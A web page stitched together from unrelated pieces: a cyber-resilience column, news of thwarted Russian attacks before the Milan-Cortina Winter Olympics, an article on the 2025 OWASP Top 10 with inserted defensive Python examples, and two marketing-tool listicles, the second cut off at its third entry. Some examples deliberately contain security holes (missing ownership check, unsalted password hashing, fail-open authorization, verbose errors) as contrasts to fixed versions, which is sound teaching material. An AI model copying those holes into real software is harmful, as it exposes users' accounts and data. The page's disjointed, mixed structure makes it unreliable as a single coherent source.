Cyber resilience is the ability to continue critical operations under degraded circumstances, like a cyber incident, and the agility to return to normal operations quickly and with minimal financial impact. It’s more than the deployment of cybersecurity tools. Backups must be recoverable, and cyber insurance policies need to pay claims. Ideally, the organization knows how long it takes to restart systems from backup and has all information at hand for claims to be paid fully and quickly.
Today, no single role owns cyber resilience, but different aspects are the purview of the CISO (safeguards), the CIO (backups) and the CFO (insurance). Collaboration between all three is required to assess that all safeguards are in place. It’s also time to upgrade manual tracking of safeguards to evidence-based, automated tracking.
The next step is to shift from activity reporting to evidence sharing and decision support. This includes providing a clear view of the state of cybersecurity, which then surfaces risks that the business needs to make decisions on in terms of whether to mitigate or accept. To use evidence to demonstrate whether the business is meeting its goals for cyber resilience, data must replace prediction. Next, automate low-value work. Free teams from repetitive audit preparation by using tools to aggregate and provide tamper-proof evidence. Focus human expertise on strategy and decision-making for cyber resilience instead of administrative tasks.
Finally, educate and contextualize for the board. Deliver short, outcome-focused updates that tie cybersecurity performance to cyber resilience goals. Reinforce the point that business risk and continuity ultimately reside with the board, not the CISO.
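The "tamper-proof evidence" and "reviewed on an appropriate cadence" points above are concrete enough to sketch. The following is an added example, not code from the article or from any product it mentions: a minimal hash-chained evidence ledger in which every control-check result commits to the previous record, so editing or deleting an earlier entry is detectable, plus a check that flags accepted risks whose last review is older than the agreed cadence. The record fields, control names and dates are constructed for illustration.

```python
# Added example (not from the article): a minimal tamper-evident evidence ledger.
# Each control-check result is appended as a record whose hash covers the previous
# record's hash, so altering or deleting any earlier entry breaks verification.
# Record contents, control names and dates are constructed for illustration.
import hashlib
import json
from datetime import datetime, timedelta

GENESIS = "0" * 64


def _record_hash(prev_hash: str, payload: dict) -> str:
    # Canonical JSON so the same evidence always hashes the same way.
    body = json.dumps(payload, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256((prev_hash + body).encode()).hexdigest()


def append_evidence(ledger: list, payload: dict) -> dict:
    prev_hash = ledger[-1]["hash"] if ledger else GENESIS
    record = {"prev_hash": prev_hash, "payload": payload,
              "hash": _record_hash(prev_hash, payload)}
    ledger.append(record)
    return record


def verify_ledger(ledger: list) -> tuple[bool, int]:
    """Return (ok, index of first bad record); the index is -1 when the chain is intact."""
    prev_hash = GENESIS
    for i, rec in enumerate(ledger):
        if rec["prev_hash"] != prev_hash or rec["hash"] != _record_hash(prev_hash, rec["payload"]):
            return False, i
        prev_hash = rec["hash"]
    return True, -1


def overdue_risk_acceptances(ledger: list, now_iso: str, max_age_days: int) -> list[str]:
    """Accepted risks whose last documented review is older than the allowed cadence."""
    now = datetime.fromisoformat(now_iso)
    last_review = {}
    for rec in ledger:
        p = rec["payload"]
        if p["type"] == "risk_acceptance":
            last_review[p["risk_id"]] = datetime.fromisoformat(p["reviewed_at"])
    return sorted(r for r, t in last_review.items() if now - t > timedelta(days=max_age_days))


def build_sample_ledger() -> list:
    # Constructed records: a control check, a backup restore test, and a risk acceptance.
    ledger = []
    append_evidence(ledger, {"type": "control_check", "control": "MFA on VPN",
                             "result": "pass", "at": "2025-11-01T08:00:00+00:00"})
    append_evidence(ledger, {"type": "restore_test", "system": "erp-db",
                             "restore_minutes": 95, "rto_minutes": 120,
                             "at": "2025-11-02T02:00:00+00:00"})
    append_evidence(ledger, {"type": "risk_acceptance", "risk_id": "R-17",
                             "reason": "legacy app, vendor end-of-life 2026",
                             "reviewed_at": "2025-06-01T00:00:00+00:00"})
    return ledger


if __name__ == "__main__":
    ledger = build_sample_ledger()
    print("intact:", verify_ledger(ledger))
    ledger[1]["payload"]["restore_minutes"] = 30   # someone "improves" the RTO evidence
    print("after tampering:", verify_ledger(ledger))
    print("overdue acceptances:",
          overdue_risk_acceptances(build_sample_ledger(), "2026-01-15T00:00:00+00:00", 180))
```

A hash chain only proves that the ledger has not been rewritten since the last record an independent party saw; in practice the head hash is published or signed on a schedule so that the ledger owner cannot quietly regenerate the whole chain.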
Better language, stronger trust
Cyber resilience is a business problem, not an IT and cybersecurity problem. The board will understand it when evidence-driven communication fosters transparency, trust and clarity of action. As they hear information relayed in language they can understand, boards gain confidence in investments and governance decisions. This results in fewer redlines on board reports, more meaningful conversations and longer CISO tenures. It moves cybersecurity from a reactive cost center to a proactive value driver. When CISOs can show proof tailored to the company’s own risk tolerance, the conversation changes from uncertainty to clarity.
This article is published as part of the Foundry Expert Contributor Network.
A few days before the start of the Winter Olympics in Milan and Cortina d’Ampezzo, Italy fended off several Russian hacker attacks. The cyberattacks targeted, among other things, some Winter Games venues, including hotels in Cortina, Foreign Minister Antonio Tajani said. Facilities of his ministry were also affected.
During a visit to Washington, Tajani stressed that the attacks were of Russian origin. He thanked the security authorities that were able to thwart them. “Cybersecurity is becoming a central factor, so I am very satisfied. Of course we have informed all the other responsible authorities,” the minister added.
According to Italian media reports, local authorities prepared early for the risk of cyberattacks during the Winter Games. A team of specialists is reportedly working with experts from the Games’ organizers to fend off attacks on the event. The Winter Games begin on Friday and run until February 22. (dpa/jm)
Most of the list has remained unchanged since 2021. In fact, the top item, broken access control, has been on the Open Worldwide Application Security Project’s list since it was first released in 2003.
“Everyone tries to craft their own authentication and access control mechanisms,” says Jeff Williams, CTO and cofounder at Contrast Security. Williams created the list and served as the chair of the OWASP board for eight years.
There are standard mechanisms out there, but most applications have specialized needs, he says. “I’ve seen some really god-awful horrific machines that people have built to do access control checks, and they don’t build them elegantly. They build them piece by piece. ‘Oh, we’re building this function, we need to do an access check’ — and they build their own access check. And almost nobody tests access control.”
A typical web application may have a hundred endpoints, Williams says, each one of which can be accessed by a number of different roles. “Now you have to make sure that each of those routes work in each of those roles. Most people do a scan of their application with one role in mind, like that of a normal user. And maybe with an admin user. But there could be twenty different roles, so it’s very difficult to verify.”
AI didn’t make the top ten list, but it was included in a “next steps” section of issues on the cusp of inclusion, in addition to a lack of application resilience and memory management failures.
This AI category is titled: X03:2025 Inappropriate Trust in AI Generated Code (‘Vibe Coding’).
“Although we didn’t have data to support the fact that AI-generated code is causing significantly more risk than human-written code available, thanks to community feedback, professional experience, and constant online sharing of such data, we felt it prudent to add a section,” says Tanya Janca, lead author of the OWASP Top 10.
Developers should read and fully understand AI-generated code before committing it, she says.
The OWASP Top 10 list is based on a combination of security data from a dozen different organizations, covering nearly 3 million applications, as well as a survey of 221 security experts, says security metrics expert Aram Hovsepyan, CEO at Codific and an OWASP contributing member.
Here are the top 10:
1 – Broken access control
When applications fail to properly enforce restrictions on what authenticated users are allowed to do, allowing attackers to access unauthorized functionality or data. For example, an attacker might manipulate a URL parameter to access another user’s account information or escalate their privileges from a regular user to an administrator. This item now includes server-side request forgery, which was its own list item in 2021.
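The URL-parameter case above and Williams’s point that almost nobody tests every route against every role are shown together in the following added example, which is not code from the article or from OWASP. The account data, users, roles and routes are constructed: an account endpoint that authenticates but never checks ownership (an insecure direct object reference), the fixed version with the check beside the data access, and a matrix test that runs every route as every persona and reports where observed behaviour contradicts the written policy.

```python
# Added example (not from the article): broken access control on an account endpoint,
# its fix, and an authorization-matrix check that exercises every route with every role.
# Users, roles, accounts and routes are constructed for illustration.
ACCOUNTS = {
    "u1": {"owner": "alice", "balance": 120},
    "u2": {"owner": "bob", "balance": 9000},
}
USERS = {"alice": "user", "bob": "user", "carol": "admin"}


class Forbidden(Exception):
    pass


def get_account_vulnerable(caller: str, account_id: str) -> dict:
    # Authenticates the caller (must be a known user) but never checks ownership:
    # alice can request account u2 and read bob's balance.
    if caller not in USERS:
        raise Forbidden("unauthenticated")
    return ACCOUNTS[account_id]


def get_account(caller: str, account_id: str) -> dict:
    # The authorization check lives beside the data access, not in each caller.
    if caller not in USERS:
        raise Forbidden("unauthenticated")
    acct = ACCOUNTS[account_id]
    if acct["owner"] != caller and USERS[caller] != "admin":
        raise Forbidden("not owner")
    return acct


def delete_account(caller: str, account_id: str) -> bool:
    if USERS.get(caller) != "admin":
        raise Forbidden("admin only")
    return account_id in ACCOUNTS


# Expected outcome for every (route, persona) pair; "deny" means Forbidden must be raised.
ROUTES = {"get_account": get_account, "delete_account": delete_account}
POLICY = {
    ("get_account", "user_owner"): "allow",
    ("get_account", "user_other"): "deny",
    ("get_account", "admin"): "allow",
    ("delete_account", "user_owner"): "deny",
    ("delete_account", "user_other"): "deny",
    ("delete_account", "admin"): "allow",
}
PERSONAS = {"user_owner": "alice", "user_other": "bob", "admin": "carol"}
TARGET = "u1"  # owned by alice


def check_matrix(routes=ROUTES) -> list[tuple[str, str]]:
    """Return the (route, persona) pairs whose observed behaviour contradicts POLICY."""
    failures = []
    for (route, persona), expected in POLICY.items():
        try:
            routes[route](PERSONAS[persona], TARGET)
            observed = "allow"
        except Forbidden:
            observed = "deny"
        if observed != expected:
            failures.append((route, persona))
    return sorted(failures)


if __name__ == "__main__":
    print("hardened routes, policy violations:", check_matrix())
    print("vulnerable route, policy violations:",
          check_matrix({**ROUTES, "get_account": get_account_vulnerable}))
```

The matrix is the part that scales: with a hundred endpoints and twenty roles the policy table is the artifact to review, and the loop finds the one route someone forgot to guard. The check belongs in CI, run against a test deployment with one credential per role.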
2 – Security misconfiguration
Security settings are not properly defined, implemented, or maintained, leaving systems exposed to attack. Common examples include default credentials that are never changed, unnecessary features left enabled, verbose error messages that reveal sensitive information, or cloud storage buckets left publicly accessible. This vulnerability jumped from fifth place in 2021 to second place in 2025.
3 – Software supply chain failures
Attackers compromise software during the build, distribution or updates to inject malicious code that gets distributed to multiple organizations. For example, attackers might compromise a popular open-source library and inject malicious code that then gets incorporated into thousands of applications that depend on it or breach a vendor’s system to insert backdoors into legitimate software updates. This is a new list item, though there was a narrower related item in 2021 — vulnerable and outdated components.
“Developers have become a primary target for many online attacks now,” says Janca. “It is no longer a problem of including a library that has a questionable dependency.” Instead, she says, there are now active attacks against the IDE, against the CI/CD pipeline, against plugins and repositories, against developer workstations, and more. “The entire software supply chain is currently a focus for attackers,” she says.
4 – Cryptographic failures
Applications fail to properly protect sensitive data through encryption or use weak or broken cryptographic algorithms. Examples include transmitting sensitive data in clear text, using weak encryption algorithms, not properly validating SSL/TLS certificates, or storing passwords without proper hashing. These failures often lead to sensitive data exposure or system compromise. This item moved down from second place on 2021’s list.
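The last failure in that list, passwords stored without proper hashing, is the one most often found in code review, so here is an added example (not from the article or from OWASP) contrasting an unsalted fast hash with a salted, iterated key derivation and a constant-time comparison. It uses only the Python standard library; the iteration count and sample passwords are chosen here for illustration.

```python
# Added example (not from the article): storing passwords with an unsalted fast hash
# (the failure) versus a salted, iterated KDF with a constant-time comparison (the fix).
# Standard library only; iteration count and sample passwords chosen for illustration.
import hashlib
import hmac
import os

ITERATIONS = 600_000  # PBKDF2-HMAC-SHA256 work factor; raise as hardware allows


def store_weak(password: str) -> str:
    # Unsalted SHA-256: identical passwords give identical hashes, and the result can
    # be looked up in precomputed tables or brute-forced at GPU speed.
    return hashlib.sha256(password.encode()).hexdigest()


def store_strong(password: str, salt: bytes = b"") -> str:
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    # Self-describing record so the parameters can be upgraded later without a reset.
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_strong(password: str, record: str) -> bool:
    algo, iters, salt_hex, dk_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    # compare_digest avoids leaking how many leading bytes matched through timing.
    return hmac.compare_digest(dk, bytes.fromhex(dk_hex))


def weak_hashes_collide(p1: str, p2: str) -> bool:
    """True when two users with the same password get the same stored value (weak scheme)."""
    return store_weak(p1) == store_weak(p2)


def strong_hashes_collide(p1: str, p2: str) -> bool:
    """False even for identical passwords, because each record carries its own salt."""
    return store_strong(p1) == store_strong(p2)


if __name__ == "__main__":
    rec = store_strong("correct horse battery staple")
    print(rec)
    print("verify ok:", verify_strong("correct horse battery staple", rec))
    print("verify wrong:", verify_strong("Correct horse battery staple", rec))
    print("weak scheme collides:", weak_hashes_collide("hunter2", "hunter2"))
    print("strong scheme collides:", strong_hashes_collide("hunter2", "hunter2"))
```

Where a memory-hard function such as scrypt or Argon2 is available it is the better choice; the record format above is what makes that migration possible later, because each stored hash names its own algorithm and parameters.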
5 – Injection
Untrusted data is submitted as part of a command or query, tricking the application into executing unintended commands or accessing unauthorized data. Examples range from cross-site scripting, where attackers inject malicious scripts into web pages viewed by other users, to SQL injection, where they use database queries to access or modify sensitive data. This item has also moved a couple of spots down on this year’s list.
6 – Insecure design
Security wasn’t properly considered during the design phase of the application, resulting in missing or ineffective controls. Examples include failing to implement proper threat modeling, not establishing security requirements before development begins, or designing systems that lack defense in depth. This category was introduced in 2021 to focus on design and architectural flaws rather than implementation bugs, but it’s moved down a couple of places because the industry has made noticeable improvements in threat modeling.
7 – Authentication failures
Applications fail to properly verify the identity of users or fail to protect authentication credentials and session tokens. Examples include allowing brute force attacks, permitting weak passwords, exposing session IDs in URLs, not properly invalidating sessions after logout, or failing to implement multi-factor authentication for sensitive functions.
8 – Software or data integrity failures
Applications fail to maintain trust boundaries and verify the integrity of software, code, and data artifacts. Examples include applications that rely on plugins, libraries, or modules from untrusted sources without integrity checks, insecure CI/CD pipelines that allow code to be modified before deployment, or applications that auto-update without verifying digital signatures.
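The supply chain item above and this integrity item share one mechanical control: nothing fetched from outside is installed or executed until it matches a digest pinned at review time. The following added example, which is not code from the article or from any package manager it mentions, parses a small lockfile of SHA-256 pins in a constructed format (loosely modelled on how pip’s `--require-hashes` mode works) and classifies each fetched artifact as ok, mismatched, missing or unpinned. The package names and artifact bytes are constructed.

```python
# Added example (not from the article): verifying fetched build artifacts against a
# pinned lockfile of SHA-256 digests before they are installed or executed, the check
# an auto-updater or CI step needs so a swapped package is rejected. The lockfile
# format, package names and artifact bytes are constructed for illustration.
import hashlib


def digest(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def parse_lockfile(text: str) -> dict:
    """Lines of '<name>==<version> sha256:<hex>' (constructed format)."""
    pins = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        spec, h = line.split()
        algo, hexdigest = h.split(":", 1)
        if algo != "sha256":
            raise ValueError(f"unsupported hash algorithm for {spec}: {algo}")
        pins[spec] = hexdigest.lower()
    return pins


def verify_artifacts(pins: dict, fetched: dict) -> dict:
    """Classify every package: ok, mismatch (tampered or wrong file), missing, or unpinned."""
    result = {}
    for spec, expected in pins.items():
        data = fetched.get(spec)
        if data is None:
            result[spec] = "missing"
        elif digest(data) != expected:
            result[spec] = "mismatch"
        else:
            result[spec] = "ok"
    # Anything fetched that is not pinned must not be installed either.
    for spec in fetched:
        if spec not in pins:
            result[spec] = "unpinned"
    return result


def install_allowed(report: dict) -> bool:
    return all(v == "ok" for v in report.values())


# Constructed artifacts standing in for downloaded wheels or tarballs.
GOOD_LIB = b"def parse(x):\n    return x.split(',')\n"
BACKDOORED_LIB = GOOD_LIB + b"import socket  # added upstream after the hash was pinned\n"
LOCKFILE = f"""
# pinned at build time and reviewed in the pull request
csvlite==1.2.0 sha256:{digest(GOOD_LIB)}
"""


if __name__ == "__main__":
    pins = parse_lockfile(LOCKFILE)
    print(verify_artifacts(pins, {"csvlite==1.2.0": GOOD_LIB}))
    print(verify_artifacts(pins, {"csvlite==1.2.0": BACKDOORED_LIB}))
    print(verify_artifacts(pins, {"csvlite==1.2.0": GOOD_LIB, "leftpad==0.1": b"..."}))
```

A pinned digest proves only that the artifact is the one that was reviewed; it says nothing about whether that review was adequate or whether the upstream was already compromised when the pin was taken. Signed provenance from the publisher adds the second half, and the same fail-closed structure applies: an unverifiable signature is a rejection, not a warning.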
9 – Security logging and alerting failures
Applications fail to log security-relevant events or fail to alert security teams when suspicious activities occur. Examples include not logging failed login attempts, storing logs locally without backup, logging insufficient detail to reconstruct attacks or generating logs that don’t integrate with security information and event management (SIEM) systems. Great logging with no alerting is of minimal value in identifying security incidents.
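The brute-force case from the authentication item and the "logging with no alerting" point here meet in one detection rule. The following is an added example, not from the article or from any SIEM: it parses constructed auth log lines in a made-up but realistic format, counts failed logins per source IP over a sliding window, and emits one alert the moment an IP reaches the threshold, reporting which accounts were tried (a spread of usernames from one IP is the password-spraying shape). Malformed lines are counted rather than silently dropped, since a parser that ignores what it cannot read is itself a logging failure.

```python
# Added example (not from the article): the detection side of authentication and
# logging failures. It parses constructed auth log lines and raises an alert when one
# source IP accumulates too many failed logins inside a sliding window.
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log format: ISO timestamp, event, user, source IP.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) auth (?P<event>login_ok|login_failed) user=(?P<user>\S+) ip=(?P<ip>\S+)$"
)

# Constructed sample: a five-user spray from 203.0.113.7, one stray failure elsewhere,
# a normal success, one line the parser cannot read, and a failure half an hour later.
SAMPLE_LOG = """\
2026-02-01T10:00:00 auth login_failed user=alice ip=203.0.113.7
2026-02-01T10:00:03 auth login_failed user=bob ip=203.0.113.7
2026-02-01T10:00:05 auth login_ok user=carol ip=198.51.100.2
2026-02-01T10:00:06 auth login_failed user=carol ip=203.0.113.7
2026-02-01T10:00:07 kernel: unrelated message that does not match the auth format
2026-02-01T10:00:09 auth login_failed user=dave ip=203.0.113.7
2026-02-01T10:00:11 auth login_failed user=erin ip=203.0.113.7
2026-02-01T10:30:00 auth login_failed user=alice ip=198.51.100.2
2026-02-01T10:30:00 auth login_failed user=alice ip=203.0.113.7
"""


def parse(line: str):
    m = LINE_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.fromisoformat(d["ts"])
    return d


def detect_bruteforce(log_text: str, threshold: int = 5,
                      window: timedelta = timedelta(seconds=60)) -> dict:
    """Alert the first time an IP reaches `threshold` failures within `window`."""
    alerts, unparsed = [], 0
    recent = defaultdict(deque)   # ip -> (timestamp, user) of failures still inside the window
    for line in log_text.splitlines():
        ev = parse(line)
        if ev is None:
            unparsed += 1
            continue
        if ev["event"] != "login_failed":
            continue
        q = recent[ev["ip"]]
        q.append((ev["ts"], ev["user"]))
        while q and ev["ts"] - q[0][0] > window:
            q.popleft()
        if len(q) == threshold:   # '==' so a continuing burst does not re-alert on every line
            alerts.append({"ip": ev["ip"],
                           "first_seen": q[0][0].isoformat(),
                           "last_seen": ev["ts"].isoformat(),
                           "users": sorted({u for _, u in q})})
    return {"alerts": alerts, "unparsed": unparsed}


if __name__ == "__main__":
    report = detect_bruteforce(SAMPLE_LOG)
    for a in report["alerts"]:
        print(f"ALERT {a['ip']} {len(a['users'])} accounts {a['first_seen']}..{a['last_seen']}: {a['users']}")
    print("unparsed lines:", report["unparsed"])
```

The same counter, kept server-side per account and per source, is what drives lockout or rate limiting at the application; the detection rule exists for the case where the application does not do that, or where the attacker stays just under its limit.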
10 – Mishandling of exceptional conditions
Applications fail to properly handle errors, edge cases, and abnormal conditions, leading to security vulnerabilities. Examples include displaying detailed error messages that reveal sensitive information about system architecture, security checks that fail and allow unauthorized access when errors occur, or applications that crash and expose sensitive data in memory dumps.
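Two of the examples above, a security check that fails open when an error occurs and an error message that reveals system detail (also listed under security misconfiguration), are shown in the following added example, which is not code from the article or from OWASP. The token store and the simulated backend outage are constructed: the first authorization function treats any exception as "allow", the second denies and logs, and the two error-response helpers show the exception text going to the client versus a correlation ID with the detail kept in server logs.

```python
# Added example (not from the article): an authorization check whose error handling
# fails open (the bug), the fail-closed version, and an error response that logs the
# detail internally while returning only a reference ID to the client. The token store
# and the "backend outage" flag are constructed for illustration.
import logging
import uuid

log = logging.getLogger("authz")


class BackendUnavailable(Exception):
    pass


TOKENS = {"tok-abc": {"user": "alice", "scopes": {"read"}}}


def lookup_token(token: str, backend_up: bool = True):
    if not backend_up:
        raise BackendUnavailable("token service timeout contacting db1.internal")
    return TOKENS.get(token)


def is_allowed_fail_open(token: str, scope: str, backend_up: bool = True) -> bool:
    try:
        info = lookup_token(token, backend_up)
    except Exception:
        return True   # "don't break the app during an outage": every caller is now authorized
    return info is not None and scope in info["scopes"]


def is_allowed(token: str, scope: str, backend_up: bool = True) -> bool:
    try:
        info = lookup_token(token, backend_up)
    except BackendUnavailable:
        log.error("authz backend unavailable; denying request")
        return False  # fail closed: an outage degrades availability, not access control
    return info is not None and scope in info["scopes"]


def error_response(exc: Exception) -> tuple:
    """Client gets a status and a correlation ID; the exception detail stays in server logs."""
    ref = uuid.uuid4().hex[:12]
    log.error("request failed ref=%s", ref, exc_info=exc)
    return 500, {"error": "internal error", "ref": ref}


def error_response_verbose(exc: Exception) -> tuple:
    # The misconfiguration: the exception text (hostnames, SQL, paths) goes to the client.
    return 500, {"error": repr(exc)}


if __name__ == "__main__":
    logging.basicConfig(level=logging.ERROR)
    print("normal:", is_allowed("tok-abc", "read"), is_allowed("tok-abc", "write"))
    print("outage, fail-open grants unknown token:", is_allowed_fail_open("tok-nope", "read", backend_up=False))
    print("outage, fail-closed:", is_allowed("tok-nope", "read", backend_up=False))
    err = BackendUnavailable("token service timeout contacting db1.internal")
    print("verbose:", error_response_verbose(err))
    print("sanitized:", error_response(err))
```

The fail-closed version also catches only the exception it expects; a bare `except Exception` around a security decision hides programming errors in the check itself, which is how the fail-open variant usually gets written in the first place.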
This is a category that has been just outside the top 10 for several years, says Brian Glas, department chair of computer science at Union University and an OWASP project leader. What took this item over the top was not the data about existing vulnerabilities, he says, but the survey of experts.
“If it was purely data-driven, we would not have an accurate list as it would only be looking into the past.”
Digital marketing platform tools are an all-in-one suite of technologies that help businesses manage customer engagement, automate campaigns, analyze results, and refine strategy across digital channels. In 2026, as artificial intelligence, real-time analytics, and conversational commerce become mainstream, these platforms are crucial for maintaining agility and competitiveness. When choosing a platform, businesses should weigh factors such as integration flexibility, pricing transparency, AI capabilities, ease of use, cross-channel support, and scalability.
Top 10 Digital Marketing Platforms Tools (2026)
Based on expert insights and industry usage, here are 10 standout tools:
1. Omnisend
Short Description: E-commerce-focused email, SMS and push marketing automation.
Key Features:
- Drag-and-drop campaign builder
- SMS, email, and push notifications
- Abandoned cart workflows
- Multi-channel automation
Pros:
- Ideal for e-commerce automation
- Affordable plans with scalable features
Cons:
- SMS costs can escalate
- Fewer integrations than enterprise tools
Official Website: Omnisend

2. Salesforce Marketing Cloud
Short Description: Powerful enterprise-grade marketing automation and analytics.
Key Features:
- Email automation and segmentation
- Journey mapping
- AI-driven personalization
- Cross-channel campaign orchestration
- Deep analytics and reporting
Pros:
- Highly scalable and robust for enterprises
- Rich automation and personalization capabilities
Cons:
- Expensive; complex setup
- May require dedicated technical resources

3. Adobe Experience Cloud
Short Description: Integrated suite for analytics, advertising, content, and journey orchestration.
Key Features:
- Web analytics
- Advertising and media optimization
- Content and experience management
- Targeting and journey orchestration
Pros:
- Comprehensive set of tools under one roof
- Strong for personalized customer experiences
Cons:
- High cost; best suited for large enterprises
- Complexity requires training or support

4. Bloomreach
Short Description: AI-powered marketing automation, product discovery, and headless CMS.
Key Features:
- Email and SMS marketing automation (Engagement)
- AI-based product discovery and recommendations (Discovery)
- Headless content management (Content)
Pros:
- AI-driven personalization across channels
- Especially strong for e-commerce use cases
Cons:
- Less widespread adoption than others
- Enterprise-level pricing

5. Omneky
Short Description: AI tool that generates and optimizes ad creatives across channels.
Key Features:
- AI-driven creative generation
- Multi-channel campaign launching
- Performance insights and optimization
Pros:
- Automates creative testing at scale
- Saves time on ad production
Cons:
- Focused on creative; limited broader marketing features
- Can lack a human touch in art direction

6. Mailchimp
Short Description: Beginner-friendly email marketing with basic CRM integration.
Key Features:
- Campaign automation
- Audience segmentation
- Basic CRM tools
- Built-in templates and analytics
Pros:
- Free plan available; easy to use
- Extensive integrations
Cons:
- Limited for advanced marketers
- Segmentation options are basic

7. HubSpot Marketing Hub
Short Description: All-in-one marketing, sales, and CRM platform, ideal for growing businesses.
Key Features:
- Email marketing and automation
- Blogging and content management
- SEO tools and landing pages
- CRM integration and live chat
- Custom dashboards and analytics
- Chatbots and lead tracking
Pros:
- Comprehensive suite; strong automation
- Scalable pricing tiers, including free
Cons:
- Advanced features locked behind higher-tier plans
- Learning curve for new users due to the breadth of tools

8. Ahrefs
Short Description: Robust SEO toolkit for keyword research and link analysis.
Key Features:
- Backlink analysis
- Keyword tracking
- Site audits and competitive research
Pros:
- Highly accurate data; trusted in the SEO community
- Comprehensive features for organic search optimization
Cons:
- Costly for individuals or small teams
- Lacks email, CRM, or automation features

9. Google Ads (with Analytics and Search Console)
Short Description: PPC and SEO tools for visibility and performance tracking.
Key Features:
- Targeted ad campaigns (Search, Display, Shopping)
- Keyword optimization and budget control
- Integration with Google Analytics and Search Console
Pros:
- High-intent traffic and reach
- Powerful targeting and budget control
Cons:
- Competitive and potentially expensive CPC
- Steep learning curve for optimization

10. AI and Content Workflow Stack (Surfer SEO + ChatGPT + Notion)
Short Description: An integrated workflow for content creation, optimization, and planning.
Key Features:
- Surfer SEO: real-time content optimization
- ChatGPT: idea generation and copywriting
- Notion: collaborative planning and documentation
Pros:
- Efficient, modern content workflow
- Collaborative and scalable across teams
Cons:
- Requires manual integration
- Results depend on prompt quality

Comparison Table

| Tool Name | Best For | Platform(s) Supported | Standout Feature | Pricing | Rating (G2/Capterra) |
|---|---|---|---|---|---|
| Omnisend | E-commerce marketing campaigns | Web-based | Multi-channel automation | Paid | Solid |
| Salesforce Marketing Cloud | Enterprises with complex needs | Web-based | Journey mapping and AI personalization | Custom | High |
| Adobe Experience Cloud | Enterprises needing a full suite | Web-based | Content and journey orchestration | Custom | High |
| Bloomreach | E-commerce personalization | Web-based | AI for discovery and content management | Custom | Strong |
| Omneky | Creative ad automation | Web-based | AI creative generation | Custom | Niche |
| Mailchimp | Small teams and email marketing | Web-based | Ease of use and free tier | Free / Paid | High |
| HubSpot Marketing Hub | Growing businesses and inbound marketing | Web-based | All-in-one marketing + CRM | Free / Custom tiers | High (popular) |
| Ahrefs | SEO professionals | Web-based | Backlink and keyword insights | Paid | Top-rated |
| Google Ads + Analytics | Paid search marketing | Web-based | PPC targeting and search optimization | Pay-per-use | Industry standard |
| Surfer SEO + ChatGPT + Notion | Content marketing workflows | Web-based | AI-enhanced content creation workflow | Mixed | Growing buzz |

Which Digital Marketing Platform Tool Is Right for You?
- Startups / Small Businesses: Mailchimp or HubSpot Free / Starter provide accessible entry points with easy onboarding.
- E-commerce Stores: Omnisend is great for multi-channel automations. Bloomreach offers stronger personalization as you scale.
- SEO-focused Teams: Ahrefs excels in backlink insights. Combine with Google Ads for paid search performance.
- Large Enterprises: Salesforce Marketing Cloud and Adobe Experience Cloud offer full-scale automation, though complexity and cost are higher.
- Content Creators and Agencies: Use the Surfer SEO + ChatGPT + Notion stack for streamlined ideation-to-publishing workflows.
- Creative-Heavy Campaigns: Omneky can be a powerful addition for automated ad creative testing and scaling.

Conclusion
In 2026’s dynamic marketing environment, selecting the right digital marketing platforms tools is essential to streamline workflows, enable personalized interactions, and harness AI-powered automation. From beginner-friendly options like Mailchimp to enterprise-grade suites like Salesforce or Adobe, there’s a solution for every scale. The landscape continues evolving—so test free plans or request demos to ensure your choice aligns with your team’s workflow and goals.
FAQs
Q1: What’s the difference between marketing platforms and tools?
Marketing platforms, like HubSpot or Salesforce, are integrated suites covering multiple marketing functions; tools, like Ahrefs or Mailchimp, often focus on specific needs (SEO, email).
Q2: Are free tiers enough to get started?
Absolutely! Tools like HubSpot (Free), Mailchimp, and Google Analytics offer substantial capabilities to begin with, though advanced features may require paid plans.
Q3: How important is AI in marketing tools now?
AI is rapidly becoming essential—used for personalization, creative generation, optimization, and analytics. Platforms like Salesforce, Adobe, and Omneky are leading with AI integrations.
Q4: Can I mix multiple tools instead of choosing a platform?
Yes! Many businesses combine best-of-breed tools (e.g., Ahrefs + Surfer + Notion) for flexibility—but this requires smooth integration and management.
Q5: How do I choose the right tool without overspending?
Start with a list of must-have features, test free trials, compare pricing tiers, and prioritize tools that integrate easily with your existing stack.
AI Email Marketing Tools have revolutionized the way businesses engage with their customers. In 2025, these tools are more important than ever, allowing marketers to optimize email campaigns, personalize content, and automate tedious tasks while maximizing ROI. By leveraging machine learning and data analytics, AI email marketing tools can craft highly personalized messages, segment audiences, and predict user behavior, all of which are essential in a competitive digital landscape.
When choosing an AI Email Marketing Tool, businesses should look for features such as ease of integration with other marketing platforms, automation capabilities, analytics, personalization, and scalability. Whether you are a small business or a large enterprise, selecting the right tool depends on your specific needs, budget, and marketing objectives.
Top 10 AI Email Marketing Tools in 2025
1. Omnisend
Short Description: Omnisend specializes in omnichannel marketing, offering AI-driven email campaigns that integrate SMS and push notifications for a more unified customer experience.
Key Features:
- Omnichannel integration: combine email, SMS, and push notifications.
- AI-powered workflows: create personalized campaigns based on customer actions.
- Product recommendations: automatically suggest products based on browsing history.
- Advanced segmentation: use AI to segment your audience more effectively.
- Detailed reporting: track performance across multiple channels.
Pros:
- Great for eCommerce businesses.
- Strong omnichannel capabilities.
- User-friendly interface.
Cons:
- Limited customization options for email templates.
- Some features are only available on higher-tier plans.
Official Website: Omnisend

2. ActiveCampaign
Short Description: ActiveCampaign is a customer experience automation platform that combines email marketing, automation, sales, and CRM in one. It uses AI to improve customer engagement and streamline marketing efforts.
Key Features:
- Automated workflows: build advanced automation flows based on user behavior.
- AI-powered segmentation: automatically segment your audience for targeted messaging.
- Predictive sending: AI helps decide the best time to send emails.
- CRM integration: built-in CRM to manage contacts and interactions.
- Customer data insights: deep analytics for better campaign results.
Pros:
- Strong integration capabilities with eCommerce and CRM tools.
- Excellent customer support and onboarding process.
Cons:
- Can be complex for beginners.
- Slightly higher pricing for advanced features.
Official Website: ActiveCampaign

3. SendGrid
